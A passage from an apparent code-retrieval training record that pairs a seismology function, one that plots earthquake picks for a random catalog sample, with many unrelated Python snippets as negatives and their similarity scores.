new_clues = []\n has_changes = False\n\n for clue in self.clueset:\n if (clue[\"type\"] != SAME and clue[\"type\"] != ISAT):\n alt = self.new_clue(sames, clue)\n if alt:\n new_clues.append(alt)\n has_changes = True\n else:\n new_clues.append(clue)\n\n return new_clues if has_changes else None", "def unifyComa(self):\n#\t#\tCMwrite(\"unifyComa\")\n\t\tfor i in range(len(self.coma)):\n\t\t\tfor j in range(len(self.coma)):\n\t\t\t\tif i == j and not self.coma[i,i] == 0.:\n\t\t\t\t\tself.coma[i,j] = 1.\n\t\t\t\t\tself.comaInv[i,j] = 1.\n\t\t\t\telse:\n\t\t\t\t\tself.coma[i,j] = 0.\n\t\t\t\t\tself.comaInv[i,j] = 
0.\n\t\tself.specialCOMAs = {}", "def output_new_correlation_values():\n correlation_builder = _get_correlation_values()\n bv_data = correlation_builder.correlation_store.query(\n criteria={'property_x': 'bulk_modulus',\n 'property_y': 'vickers_hardness'}\n )\n \n print(\"Bulk Modulus/Vickers Hardness\")\n \n for item in bv_data:\n print(\"'{}': {},\".format(item['correlation_func'],\n item['correlation']))\n\n vb_data = correlation_builder.correlation_store.query(\n criteria={'property_y': 'bulk_modulus',\n 'property_x': 'vickers_hardness'}\n )\n\n print(\"Vickers Hardness/Bulk Modulus\")\n\n for item in vb_data:\n print(\"'{}': {},\".format(item['correlation_func'],\n item['correlation']))\n \n print('linlsq correlation values')\n\n bg_ad = correlation_builder.correlation_store.query_one(\n criteria={'property_x': 'band_gap_pbe',\n 'property_y': 'atomic_density',\n 'correlation_func': 'linlsq'}\n )\n\n bm_vh = correlation_builder.correlation_store.query_one(\n criteria={'property_x': 'bulk_modulus',\n 'property_y': 'vickers_hardness',\n 'correlation_func': 'linlsq'}\n )\n \n print(\"[{}, {}]\".format(bg_ad['correlation'], \n bm_vh['correlation']))", "def toggle_conms(self):\n name = 'conm2'\n if name in self.gui.geometry_actors:\n geometry_properties_change = {name : self.gui.geometry_properties[name]}\n visibility_prev = geometry_properties_change[name].is_visible\n geometry_properties_change[name].is_visible = not visibility_prev\n\n self.gui.on_update_geometry_properties_override_dialog(geometry_properties_change)", "def get_highly_correlated_feature_name_pairs(self,\n threshold = 0.7):\n\n self.X_corr = self.X.corr()\n self.X_corr = self.X_corr.where(\n np.triu(np.ones(self.X_corr.shape), k=1).astype(bool)\n )\n\n self.X_corr.to_csv(self.base_save_name + \"_X_corr.csv\")\n\n self.X_corr_pairs = self.X_corr \\\n .unstack() \\\n .sort_values(kind=\"quicksort\") \\\n .dropna()\n\n self.X_corr_pairs = self.X_corr_pairs[self.X_corr_pairs != 1]\n # name axis meaningfully.\n\n self.X_corr_pairs.to_csv(self.base_save_name + \"_X_corr_pairs.csv\", index=True)\n\n self.X_corr_above_thresh = self.X_corr[abs(self.X_corr) > threshold] \\\n .dropna(how=\"all\")\n\n # todo: Delete this. 
Reset_index is meaningless in this Series.\n self.X_corr_pairs.reset_index()\n print(\"after reset index\")\n\n print(self.X_corr_pairs.head())\n self.X_corr_pairs_set = set(self.X_corr_pairs.index.to_list())\n print(len(self.X_corr_pairs_set))", "def remove_dup_hypoDD_cat(catalog):\n rids = [ev.resource_id for ev in catalog]\n count = collections.Counter(rids)\n\n return catalog", "def calc_chromatic_coupling(self):\n raise NotImplementedError('Chromatic Coupling is not Implemented yet.')", "def clip_or_fit_solutions(self, pop, idx):\r\n for k in idx:\r\n self.repair_genotype(pop[k])", "def cre_confidence2(df): \r\n cre_list = df.creline.unique()\r\n areas = df.source.unique()\r\n n=len(areas)\r\n confnew =pd.DataFrame(np.zeros(len(df.index)),index=df.index, columns=['conf'])\r\n \r\n for kk in range(0,len(cre_list)):\r\n df_cre = df[df.creline == cre_list[kk]]\r\n print cre_list[kk]\r\n count_sym = 0\r\n count_sameffb = 0\r\n for ii in range(0,n):\r\n for jj in range(ii+1,n):\r\n ij_ffb = np.array(df_cre[(df.source == areas[ii])&(df.target == areas[jj])].ffb_c)\r\n ji_ffb = np.array(df_cre[(df.source == areas[jj])&(df.target == areas[ii])].ffb_c)\r\n if len(ij_ffb)==1 and len(ji_ffb)==1:\r\n count_sym = count_sym+1\r\n if ij_ffb == ji_ffb:\r\n count_sameffb = count_sameffb+1 \r\n confnew[df.creline == cre_list[kk]] = 1-count_sameffb/count_sym\r\n return confnew", "def complement(self):\n for cell in self.compact:\n cell.set(not cell.peg)", "def proximal(combo):\n return (combo & _PROXIMAL_MASK) >> _SHIFT", "def set_catalogue(self, catalogue, force_it=False,\n match_angsep=3, **kwargs):\n super(Image, self).set_catalogue(catalogue, force_it=force_it, **kwargs)\n\n # -- Lets save the pixel values\n if self.has_catalogue() and self.has_sepobjects():\n self.sepobjects.set_catalogue(catalogue,force_it=True,reset=False)\n self.sepobjects.match_catalogue(deltadist=match_angsep)", "def _populate_uncertainties(self):\n\n # Use the ExoParameter method to calculate uncertainties for all\n # attributes of self.\n for att in self.attributes:\n exo_param = getattr(self, att)\n exo_param.calculate_uncertainties()", "def clear_combobox_cases(self):\n\n self.ui.comboBox_case.blockSignals(True)\n self.ui.comboBox_case.setCurrentIndex(0)\n self.ui.comboBox_case.blockSignals(False)\n self.attribute_file_ids = []\n self.attributes_msg = \"\"\n self.ui.pushButton_attributes.setToolTip(\"\")", "def coalescence(self, initval, clusterList, coalescenceList, smeasure):\n intServ = InteractionService()\n intServ.coalescence(initval, clusterList, coalescenceList, smeasure)", "def _reset(self):\n if self.filename is None and not hasattr(self, 'coco_gt'):\n self.coco_gt = MaskCOCO()", "def unflip_colors(self):\n self.colors[self.bondA] = self.colA\n self.colors[self.bondB] = self.colB\n self.set_bcol(self.bondA)\n self.set_bcol(self.bondB)\n return", "def custom_reset(self):\n if self.similar:\n return [\"stocks\", \"ca\", f\"set {','.join(self.similar)}\"]\n return []", "def rec_default(self):\n self.pcdi_triggers.setText('(50,50)')\n self.pcdi_type.setText('LUCY')\n self.pcdi_iter.setText('20')\n self.pcdi_normalize.setText('true')\n self.pcdi_roi.setText('(16, 16, 16)')", "def testSetColorCorrectionSingle(self):\n self.node.color_corrections = self.color_corrections[0]\n\n self.assertEqual(\n [self.color_corrections[0]],\n self.node.color_corrections\n )", "def PerformPick(self, x, y, ignoreEntID = -1):\n pass", "def cull(self):", "def set_score_duplicates(interaction):\n same_interactions = 
custom_interactions[(custom_interactions['protein_1'] == interaction['protein_1']) & (\n custom_interactions['protein_2'] == interaction['protein_2'])]\n\n interactions_intacted = same_interactions[same_interactions['has_intacted'] == True]\n if not interactions_intacted.empty:\n index_max = interactions_intacted['score_1'].argmax()\n return interactions_intacted.loc[index_max]\n\n index_max = same_interactions['score_1'].argmax()\n return same_interactions.loc[index_max]", "def checkCorr(originalDF):\n # BEGIN: from https://www.kaggle.com/pmarcelino/comprehensive-data-exploration-with-python\n # EXPLANATION: This code visualizes the correlation matrix of the data \n # using heatmap, representing different correlation coefficients by \n # different colors.\n corrmat = originalDF.corr()\n f, ax = plt.subplots(figsize=(12,9))\n sns.heatmap(corrmat, vmax=.8, square=True)\n \n #Zoom in the important variables\n #saleprice correlation matrix\n k = 10 #number of variables for heatmap\n cols = corrmat.nlargest(k, 'SalePrice')['SalePrice'].index\n cm = np.corrcoef(originalDF[cols].values.T)\n sns.set(font_scale=1.25)\n hm = sns.heatmap(cm, cbar=True, annot=True, square=True, fmt='.2f', annot_kws={'size': 10}, yticklabels=cols.values, xticklabels=cols.values)\n plt.show()\n # END: from https://www.kaggle.com/pmarcelino/comprehensive-data-exploration-with-python\n \n \"\"\"\n It seems like 1stFlrSF and TotalBsmtSF, \n TotRmsAbvGr and GrLivArea, YearBuilt and GarageYrBlt, \n GarageArea and GarageCars are highly correlated respectively.\n Let us check the specific correlations.\n \"\"\"\n cor1 = originalDF.loc[:, \"1stFlrSF\"].corr(originalDF.loc[:, \"TotalBsmtSF\"])\n cor2 = originalDF.loc[:, \"TotRmsAbvGrd\"].corr(originalDF.loc[:, \"GrLivArea\"])\n cor3 = originalDF.loc[:, \"YearBuilt\"].corr(originalDF.loc[:, \"GarageYrBlt\"])\n cor4 = originalDF.loc[:, \"GarageArea\"].corr(originalDF.loc[:, \"GarageCars\"])\n \n print(\"1st Floor SF and Total Basement SF\")\n print(cor1)\n print(\"Total Rooms Above Ground and Ground Living Area\")\n print(cor2)\n print(\"Year Built and Garage Year Built\")\n print(cor3)\n print(\"Garage Area and Garage Cars\")\n print(cor4)\n \n # Maybe try dropping those with abs(corr) > 0.9?", "def _SetConnPrVal(self):\n\t\tlistsum = sum(self.freq_count)\n\t\t\"\"\"\n\t\tnow determine the connection priority of a \n\t\tparticular relation type with respect to other relations \n\t\t\"\"\"\n\t\tfor reln_type in range(4):\n\t\t\t\"\"\"\n\t\t\there we use the difference of current relation type \n\t\t\tfrequency with the frequencies of all other relations\n\t\t\t\"\"\"\n\t\t\t# comment - sourya\n\t\t\t#self.priority_reln[reln_type] = 2 * self.freq_count[reln_type] - listsum\n\t\t\t# add - sourya\n\t\t\tself.priority_reln[reln_type] = ((self.freq_count[reln_type] * 1.0) / listsum)", "def plot_correlation_comparison(evaluators: List, annot=False):\n nr_plots = len(evaluators) + 1\n cmap = sns.diverging_palette(220, 10, as_cmap=True)\n fig, ax = plt.subplots(2, nr_plots, figsize=(4 * nr_plots, 7))\n flat_ax = ax.flatten()\n flat_ax[nr_plots + 1].clear()\n fake_corr = []\n real_corr = associations(evaluators[0].real, nominal_columns=evaluators[0].categorical_columns, plot=False, theil_u=True,\n mark_columns=True, annot=False, cmap=cmap, cbar=False, ax=flat_ax[0])['corr']\n for i in range(1, nr_plots):\n cbar = True if i % (nr_plots - 1) == 0 else False\n fake_corr.append(\n associations(evaluators[i - 1].fake, nominal_columns=evaluators[0].categorical_columns, plot=False, 
theil_u=True,\n mark_columns=True, annot=False, cmap=cmap, cbar=cbar, ax=flat_ax[i])['corr']\n )\n if i % (nr_plots - 1) == 0:\n cbar = flat_ax[i].collections[0].colorbar\n cbar.ax.tick_params(labelsize=20)\n\n for i in range(1, nr_plots):\n cbar = True if i % (nr_plots - 1) == 0 else False\n diff = abs(real_corr - fake_corr[i - 1])\n sns.set(style=\"white\")\n az = sns.heatmap(diff, ax=flat_ax[i + nr_plots], cmap=cmap, vmax=.3, square=True, annot=annot, center=0,\n linewidths=0, cbar=cbar, fmt='.2f')\n if i % (nr_plots - 1) == 0:\n cbar = az.collections[0].colorbar\n cbar.ax.tick_params(labelsize=20)\n titles = ['Real'] + [e.name if e.name is not None else idx for idx, e in enumerate(evaluators)]\n for i, label in enumerate(titles):\n flat_ax[i].set_yticklabels([])\n flat_ax[i].set_xticklabels([])\n flat_ax[i + nr_plots].set_yticklabels([])\n flat_ax[i + nr_plots].set_xticklabels([])\n title_font = {'size': '28'}\n flat_ax[i].set_title(label, **title_font)\n plt.tight_layout()", "def isotropic_correction(self):\n isob = self.IsotropicCorrection(self,'back')\n isof = self.IsotropicCorrection(self,'front')\n sindec = np.sin(np.radians(np.array(self.df.dec.values,float)))\n fig, axx = plt.subplots(1,2, figsize=(12,5), sharey=True)\n ax=axx[1]\n for i in range(2):\n ax.plot(sindec, isob(i), '.', label='Energy Bin {}'.format(i));\n ax.set(xlabel='sin(Dec)', title='Back correction vs. Dec.')\n\n ax=axx[0]\n for f, name in [(isof, 'Front'), (isob, 'Back')]:\n means = [f(i)[np.abs(sindec)<0.25].mean() for i in range(8)]\n ax.plot(means, 'o', label=name)\n ax.set_title('Correction factor vs Energy Bin')\n ax.set(xlabel='Energy Bin',ylabel='Correction Factor',)\n\n for ax in axx:\n ax.grid(alpha=0.5);\n ax.axhline(1.0, color='k', ls='--')\n ax.legend()\n\n return fig", "def apply_kicks(self):\n\n\n for cor in self.orbit.corrs:\n if cor.ui.alarm:\n self.stop_feedback()\n logger.info(\"apply_kicks: kick exceeds limits. Try 'Uncheck Red' and recalculate correction\")\n self.error_box(\"kick exceeds limits. 
Try 'Uncheck Red' and recalculate correction\")\n return 0\n kick_table = []\n for cor in self.orbit.corrs:\n kick_mrad = cor.ui.get_value()\n logger.debug(cor.id + \" set: %s --> %s\" % (cor.ui.get_init_value(), kick_mrad))\n try:\n cor.mi.set_value(kick_mrad)\n kick_table.append({\"corrector\": cor.id, \"value\": kick_mrad})\n except Exception as e:\n logger.error(cor.id + \" apply_kicks Error: \" + str(e))\n self.cor_hist.append(kick_table)", "def twoPointCrossover(self, cl):\n points = []\n changed = False\n points.append( int( random.random() * ( cons.env.format_data.numb_attributes + 1 ) ) )\n secondPoint = int( random.random() * ( cons.env.format_data.numb_attributes + 1 ) )\n if points[0] > secondPoint:\n tempPoint = points[0]\n points[0] = secondPoint\n points.append( tempPoint )\n else:\n points.append( secondPoint )\n if cons.env.format_data.discrete_action:\n self_specified_atts = copy.deepcopy(self.specified_attributes)\n cl_specified_atts = copy.deepcopy(cl.specified_attributes)\n for i in range( points[1] ):\n if i >= points[0]:\n if i in self_specified_atts:\n if i not in cl_specified_atts:\n index = self.specified_attributes.index(i)\n cl.condition.append(self.condition.pop(index))\n cl.specified_attributes.append(i)\n self.specified_attributes.remove(i)\n changed = True #Remove att from self and add to cl\n elif i in cl_specified_atts:\n index = cl.specified_attributes.index(i) #reference to the position of the attribute in the rule representation\n self.condition.append(cl.condition.pop(index)) #Take attribute from self and add to cl\n self.specified_attributes.append(i)\n cl.specified_attributes.remove(i)\n changed = True\n return changed", "def test_resetcherrypick_restores_files_with_conflicts(\n repository: Repository, path: Path\n) -> None:\n createconflict(repository, path, ours=\"a\", theirs=\"b\")\n repository.resetcherrypick()\n\n assert path.read_text() == \"a\"", "def _prune_catalog(self) -> cat.Catalog:\n if self._import is None:\n return self._catalog\n\n needed_ids = self._find_needed_control_ids()\n\n # if a control includes controls - only include those that we know are needed\n final_control_ids = self._prune_controls(needed_ids)\n\n # build the needed groups of controls\n group_dict: Dict[str, cat.Group] = {}\n for control_id in final_control_ids:\n group_id, group_title, group_class = self._catalog_interface.get_group_info(control_id)\n group = group_dict.get(group_id)\n control = self._catalog_interface.get_control(control_id)\n if group is None:\n group = cat.Group(id=group_id, title=group_title, class_=group_class, controls=[control])\n group_dict[group_id] = group\n else:\n group_dict[group_id].controls.append(control)\n\n # find all referenced uuids - they should be 1:1 with those in backmatter\n needed_uuid_refs: Set[str] = self._find_all_uuid_refs(final_control_ids)\n\n # prune the list of resources to only those that are needed\n new_resources: Optional[List[common.Resource]] = []\n if self._catalog.back_matter is not None and self._catalog.back_matter.resources is not None:\n for resource in self._catalog.back_matter.resources:\n if resource.uuid in needed_uuid_refs:\n new_resources.append(resource)\n\n new_groups: Optional[List[cat.Group]] = list(group_dict.values())\n\n # should avoid empty lists so set to None if empty\n new_resources = new_resources if new_resources else None\n new_groups = new_groups if new_groups else None\n\n new_cat = cat.Catalog(\n uuid=str(uuid4()),\n metadata=self._catalog.metadata,\n 
back_matter=common.BackMatter(resources=new_resources),\n groups=new_groups\n )\n\n return new_cat", "def fixC(self,i,value):\n if self.coeffPattern[2] == None:\n m,n=self.m,self.n\n self.coeffPattern[2] = [None]*m\n self.coeffPattern[2][i]=value\n self._updateEstimatorSize(i)", "def swapProchiralResonance(resonance, makeAmbiguous=False):\n \n from ccpnmr.analysis.core.MoleculeBasic import areAtomsBound\n\n if resonance.resonanceSet and (len(resonance.resonanceSet.atomSets) == 1):\n atomSet = resonance.resonanceSet.findFirstAtomSet()\n atom = atomSet.findFirstAtom()\n chemAtom = atom.chemAtom\n chemAtomSet = chemAtom.chemAtomSet\n chemAtom0 = None\n \n if chemAtomSet:\n if chemAtomSet.isEquivalent:\n for chemAtomSet0 in chemAtom.chemComp.findAllChemAtomSets(isProchiral=True):\n chemAtomSets = list(chemAtomSet0.chemAtomSets)\n if chemAtomSet in chemAtomSet0.chemAtomSets:\n chemAtomSets.remove(chemAtomSet)\n chemAtom0 = chemAtomSets[0].findFirstChemAtom()\n break\n \n elif chemAtomSet.isProchiral:\n for chemAtom1 in chemAtomSet.chemAtoms:\n if chemAtom1 is not chemAtom:\n chemAtom0 = chemAtom1\n break\n\n if chemAtom0:\n atom0 = atom.residue.findFirstAtom(name=chemAtom0.name)\n if atom0 and atom0.atomSet:\n \n resonances0 = list(resonance.resonanceSet.resonances)\n resonances1 = []\n \n for resonanceSet in atom0.atomSet.resonanceSets:\n if len(resonanceSet.atomSets) == 1:\n resonances1 = list(resonanceSet.resonances)\n break\n \n resonance.resonanceSet.delete()\n if resonances1:\n resonances1[0].resonanceSet.delete()\n \n if makeAmbiguous:\n for resonance1 in resonances1:\n assignAtomsToRes([atomSet,atom0.atomSet],resonance1)\n\n for resonance0 in resonances0:\n assignAtomsToRes([atomSet,atom0.atomSet],resonance0)\n\n else:\n \n for resonance1 in resonances1:\n assignAtomsToRes([atomSet, ],resonance1)\n\n for resonance0 in resonances0:\n assignAtomsToRes([atom0.atomSet, ],resonance0)\n \n if chemAtomSet.isEquivalent:\n for resonance0 in resonances0:\n resonancesX = getBoundResonances(resonance0, recalculate=True)\n \n for bound in resonancesX:\n if bound.resonanceSet:\n atomB = bound.resonanceSet.findFirstAtomSet().findFirstAtom()\n \n if areAtomsBound(atom, atomB):\n swapProchiralResonance(bound, makeAmbiguous)\n \n break\n \n else:\n for resonance1 in resonances1:\n resonancesX = getBoundResonances(resonance0, recalculate=True)\n \n for bound in resonancesX:\n if bound.resonanceSet:\n atomB = bound.resonanceSet.findFirstAtomSet().findFirstAtom()\n \n if areAtomsBound(atom0, atomB):\n swapProchiralResonance(bound, makeAmbiguous)\n \n break", "def DefinePRCatConstraint( self, placement, officeData, persoData ) :\n suffix = self.GetColumnsOption(persoData) if self.multi else ['']\n\n #returns which property has the office\n officeFilter = pd.pivot_table(officeData.loc[:,[self.label]], columns=self.label, index=officeData.index, aggfunc=len).fillna(0)\n\n #return the weight that a person attribute to being allocaetd category i\n # persoFilter = pd.pivot_table(persoData, values=self.weightLabel, columns=self.label, index=persoData.index, aggfunc='sum').fillna(0)\n persoFilter = pd.DataFrame()\n for x in suffix :\n table = pd.pivot_table(persoData, values=self.weightLabel+str(x), columns=self.label+str(x), index=persoData.index, aggfunc='sum').fillna(0)\n persoFilter = persoFilter.add(table, fill_value=0)\n\n commonLabels = list(set(persoFilter.columns).intersection(officeFilter.columns))\n officeFilter = officeFilter.loc[:,commonLabels].values\n self.wish = 
persoFilter.loc[:,commonLabels].values\n\n #return the properties which have been allocated to each perso\n self.dispo = np.dot( placement, officeFilter )", "def _fix_array_item_vals(self):\n for m in self.masks():\n if self._has_categorical_data(m):\n lib_vals = 'lib@values@{}'.format(m)\n self._meta['masks'][m]['values'] = lib_vals\n for s in self.sources(m):\n self._meta['columns'][s]['values'] = lib_vals\n return None", "def pick(self):\n self._val = False", "def clean(self):\n self.unique_combinations = {}\n self.reverse_combinations = []\n self.label_count = None", "def removeAllCorrelations(self, removeReImCorrel = True):\n\t\tdim = len(self.coma)/2\n#\t#\tCMwrite(\"removeAllCorrelations\")\n\t\tfor i in range(dim):\n\t\t\tfor j in range(dim):\n\t\t\t\tif not i == j:\n\t\t\t\t\tself.coma[2*i ,2*j ] = 0.\t\t\n\t\t\t\t\tself.coma[2*i+1,2*j ] = 0.\n\t\t\t\t\tself.coma[2*i ,2*j+1] = 0.\n\t\t\t\t\tself.coma[2*i+1,2*j+1] = 0.\n\t\t\t\telif removeReImCorrel:\n\t\t\t\t\tself.coma[2*i+1,2*j ] = 0.\n\t\t\t\t\tself.coma[2*i ,2*j+1] = 0.\n\t\tself.makeComaInv()\n\t\tself.specialCOMAs = {}", "def _update_correlation(self, clean_samples, prev_dependent_properties):\n batch_properties = self._get_correlation_dependent_properties(clean_samples)\n batch_corr = self._get_correlation(clean_samples, batch_properties)\n\n self.correlation_matrix = self._merge_correlation_helper(\n self.correlation_matrix, prev_dependent_properties[\"mean\"],\n prev_dependent_properties[\"std\"], self.total_samples - self.row_is_null_count,\n batch_corr, batch_properties[\"mean\"],\n batch_properties[\"std\"], batch_properties['count'])", "def _reset_derived_prop_(self):\n self._derived_properties[\"photosamplers\"] = None", "def redundantECsForContributingNeofunctionalisation(self, \n majorityPercentageCoreMetabolism = defaultMajorityPercentageCoreMetabolism, \n majorityPercentageNeofunctionalisation = defaultMajorityPercentageNeofunctionalisation, \n eValue = defaultEValue, \n redundancyType: 'RedundancyType' = None,\n considerOnlyECs = None) -> Dict[Neofunctionalisation, Set[EcNumber]]:\n from FEV_KEGG.Robustness.Topology.Redundancy import Redundancy, RedundancyContribution, RedundancyType\n \n if redundancyType is None:\n redundancyType = RedundancyType.default\n \n #- calculate \"neofunctionalised\" ECs\n neofunctionalisedMetabolismSet = self.neofunctionalisedECs(majorityPercentageCoreMetabolism, majorityPercentageNeofunctionalisation, eValue, considerOnlyECs).getECs()\n neofunctionalisationsForFunctionChange = self.neofunctionalisationsForFunctionChange(majorityPercentageCoreMetabolism, majorityPercentageNeofunctionalisation, eValue, considerOnlyECs)\n \n #- calculate redundancy\n redundancy = Redundancy( self.coreMetabolism(majorityPercentageCoreMetabolism) )\n redundancyContribution = RedundancyContribution(redundancy, neofunctionalisedMetabolismSet)\n \n contributedECsForContributingNeofunctionalisedEC = redundancyContribution.getContributedKeysForSpecial(redundancyType)\n contributingNeofunctionalisedECs = set(contributedECsForContributingNeofunctionalisedEC.keys())\n \n #- REPEAT for each function change consisting of \"neofunctionalised\" ECs, which also contribute to redundancy\n contributingNeofunctionalisations = dict()\n \n for functionChange, neofunctionalisations in neofunctionalisationsForFunctionChange.items():\n #- report enzyme pairs of neofunctionalisations, which caused the EC to be considered \"neofunctionalised\", and are in return contributing to redundancy \n \n if functionChange.ecA in 
contributingNeofunctionalisedECs or functionChange.ecB in contributingNeofunctionalisedECs: # function change contributes to redundancy\n \n for neofunctionalisation in neofunctionalisations:\n currentSetOfContributedECs = contributingNeofunctionalisations.get(neofunctionalisation, None)\n \n if currentSetOfContributedECs is None:\n currentSetOfContributedECs = set()\n contributingNeofunctionalisations[neofunctionalisation] = currentSetOfContributedECs\n \n for ec in functionChange.ecPair:\n contributedECs = contributedECsForContributingNeofunctionalisedEC.get(ec, None)\n if contributedECs is not None:\n currentSetOfContributedECs.update(contributedECs)\n \n return contributingNeofunctionalisations", "def __reset_crosshair(self):\n self.lhor.set_ydata(self.y_coord)\n self.lver.set_xdata(self.x_coord)", "def test_uc_to_assignment(self):\r\n expected = {'q1': (['A', 'B', 'C'], 1.0, 2),\r\n 'q2': (['A', 'H', 'I', 'J'], 2. / 3., 3),\r\n 'q3': (['Unassigned'], 1.0, 1),\r\n 'q4': (['Unassigned'], 1.0, 1),\r\n 'q5': (['Unassigned'], 1.0, 1)\r\n }\r\n params = {'id_to_taxonomy_fp': self.id_to_tax1_fp,\r\n 'reference_sequences_fp': self.refseqs1_fp}\r\n t = UclustConsensusTaxonAssigner(params)\r\n actual = t._uc_to_assignment(self.uc1_lines)\r\n self.assertEqual(actual, expected)\r\n\r\n # change label for unassignable\r\n expected = {'q1': (['A', 'B', 'C'], 1.0, 2),\r\n 'q2': (['A', 'H', 'I', 'J'], 2. / 3., 3),\r\n 'q3': (['x'], 1.0, 1),\r\n 'q4': (['x'], 1.0, 1),\r\n 'q5': (['x'], 1.0, 1)\r\n }\r\n params = {'id_to_taxonomy_fp': self.id_to_tax1_fp,\r\n 'reference_sequences_fp': self.refseqs1_fp,\r\n 'unassignable_label': 'x'}\r\n t = UclustConsensusTaxonAssigner(params)\r\n actual = t._uc_to_assignment(self.uc1_lines)\r\n self.assertEqual(actual, expected)", "def _c_correlation(cls, X, y):\n su = np.zeros(X.shape[1])\n for i in np.arange(X.shape[1]):\n su[i] = cls._symmetrical_uncertainty(X[:, i], y)\n return su", "def update_naked_set(ns, cpns):\n for k, v in cpns.items():\n if len(v) == 1:\n del ns[v.pop()]\n else:\n if len(set(v)) < 3:\n for coord in set(v):\n del ns[coord]\n return ns", "def SwapSides(self):\n for c in self.reactants:\n c.coeff = -c.coeff", "def visualize_correspondence(opt, source_shape, source_face, target_shape, target_face, corres_1, corres_2):\n # save these points with color codes\n P = corres_2.shape[0]\n assert(corres_1.shape[0] == corres_2.shape[0])\n corres_1 = corres_1.cpu().numpy().reshape(-1)\n corres_2 = corres_2.cpu().numpy().reshape(-1)\n normalize = Normalize(vmin=0, vmax=corres_1.shape[0])\n cmap = cm.get_cmap(\"jet\")\n colors_picked = cmap(normalize(np.arange(P, dtype=np.float32)))[:, :3]\n colors_source = np.ones((source_face.shape[1], 3), dtype=np.float32)\n colors_source[corres_1, :] = colors_picked\n save_ply_with_face(source_shape[0].cpu().detach().numpy(), source_face[0].cpu().detach().numpy(),\n os.path.join(opt.log_dir, opt.subdir, \"source_corr.ply\"), colors_source)\n colors_target = np.ones((target_face.shape[1], 3), dtype=np.float32)\n colors_target[corres_2, :] = colors_picked\n save_ply_with_face(target_shape[0].cpu().detach().numpy(), target_face[0].cpu().detach().numpy(),\n os.path.join(opt.log_dir, opt.subdir, \"target_corr.ply\"), colors_target)" ]
[ "0.55101144", "0.54023015", "0.5400192", "0.5268006", "0.5240452", "0.5010482", "0.4968746", "0.48149148", "0.4811697", "0.47968152", "0.47857383", "0.47856605", "0.47505182", "0.47229475", "0.46873763", "0.46638468", "0.46599233", "0.46597108", "0.46573195", "0.4628536", "0.46191543", "0.46072078", "0.4606475", "0.46052068", "0.45919237", "0.45742354", "0.45686254", "0.45517054", "0.45242178", "0.4513519", "0.4499908", "0.44961277", "0.44954637", "0.44935793", "0.44924453", "0.44863918", "0.44839963", "0.44789845", "0.44778317", "0.44729632", "0.44630957", "0.44590563", "0.44568962", "0.44467616", "0.4441275", "0.44391435", "0.442838", "0.4427632", "0.4421113", "0.44191873", "0.44038394", "0.4403729", "0.43915924", "0.4389732", "0.43802077", "0.43766102", "0.4374492", "0.43621525", "0.43497", "0.43461654", "0.43445364", "0.43413162", "0.43392822", "0.43392232", "0.4334612", "0.4334567", "0.43338436", "0.43322414", "0.43221492", "0.4320541", "0.43087465", "0.43058947", "0.43022114", "0.42959103", "0.4293332", "0.42931727", "0.42899612", "0.4284285", "0.42818248", "0.4272806", "0.42702317", "0.42678192", "0.42649105", "0.42566013", "0.42520466", "0.42518732", "0.4251432", "0.42449823", "0.42417753", "0.42416587", "0.42352676", "0.42273208", "0.42234692", "0.4223213", "0.42224613", "0.42206612", "0.4219931", "0.4216707", "0.4208439", "0.42071503" ]
0.49707213
6
Function to plot a random sample from a catalog with picks
def simple_pick_plot(cat, n_events, template_dict, st_dict, pyasdf=None, savefiles=False):\n    """Plot the picks of a random sample of catalog events over their detection waveforms.\n\n    rand_cat_sample() and daterange() are helpers assumed to be defined elsewhere in this module.\n    """\n    from obspy import UTCDateTime, Stream\n    from obspy.core.event import ResourceIdentifier\n    from eqcorrscan.utils.plotting import plot_repicked  # assumed source of plot_repicked\n    if n_events == 'all':\n        rand_cat = cat\n    else:\n        rand_cat = rand_cat_sample(cat, n_events)\n    # Make a list of year + julday integers to loop over\n    min_date = min([ev.preferred_origin().time for ev in rand_cat])\n    max_date = max([ev.preferred_origin().time for ev in rand_cat])\n    for date in daterange(min_date, max_date):\n        day_cat = rand_cat.filter("time >= " + str(UTCDateTime(date)), "time <= " + str(UTCDateTime(date) + 86400))\n        if len(day_cat) == 0:\n            continue\n        # Map each picked station to the list of channels picked on it\n        stachans = {pk.waveform_id.station_code: [] for ev in day_cat for pk in ev.picks}\n        for ev in day_cat:\n            for pick in ev.picks:\n                if pick.waveform_id.channel_code not in stachans[pick.waveform_id.station_code]:\n                    stachans[pick.waveform_id.station_code].append(pick.waveform_id.channel_code)\n        print(stachans)\n        # Read the waveforms for this day; note that the plotting below uses the\n        # pre-extracted streams in st_dict rather than st\n        if pyasdf:\n            import pyasdf as asdf  # alias so the 'pyasdf' path argument does not shadow the module\n            st = Stream()\n            with asdf.ASDFDataSet(pyasdf) as ds:\n                for sta in stachans:\n                    for station in ds.ifilter(ds.q.station == str(sta), ds.q.channel == stachans[sta], ds.q.starttime >= UTCDateTime(date), ds.q.endtime <= UTCDateTime(date) + 86400):\n                        st += station.raw_recording\n        for ev in day_cat:\n            det_st = st_dict[ev.resource_id]\n            det_temp = template_dict[ResourceIdentifier('smi:local/' + str(ev.resource_id).split('/')[-1].split('_')[0] + '_1sec')]\n            fig = plot_repicked(det_temp, ev.picks, det_st, size=(21, 15), save=savefiles, savefile=str(ev.resource_id).split('/')[-1] + '.png', title=str(ev.resource_id).split('/')[-1])
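A minimal usage sketch for the function above; the file names, and the way template_dict and st_dict are keyed, are hypothetical placeholders rather than anything taken from the original source:

from obspy import read_events

cat = read_events('detections.xml')  # hypothetical QuakeML catalog of detections with picks
template_dict = {}  # assumed mapping: template ResourceIdentifier -> template Stream
st_dict = {}        # assumed mapping: event resource_id -> detection Stream
simple_pick_plot(cat, n_events=10, template_dict=template_dict, st_dict=st_dict,
                 pyasdf='waveforms.h5', savefiles=True)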
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
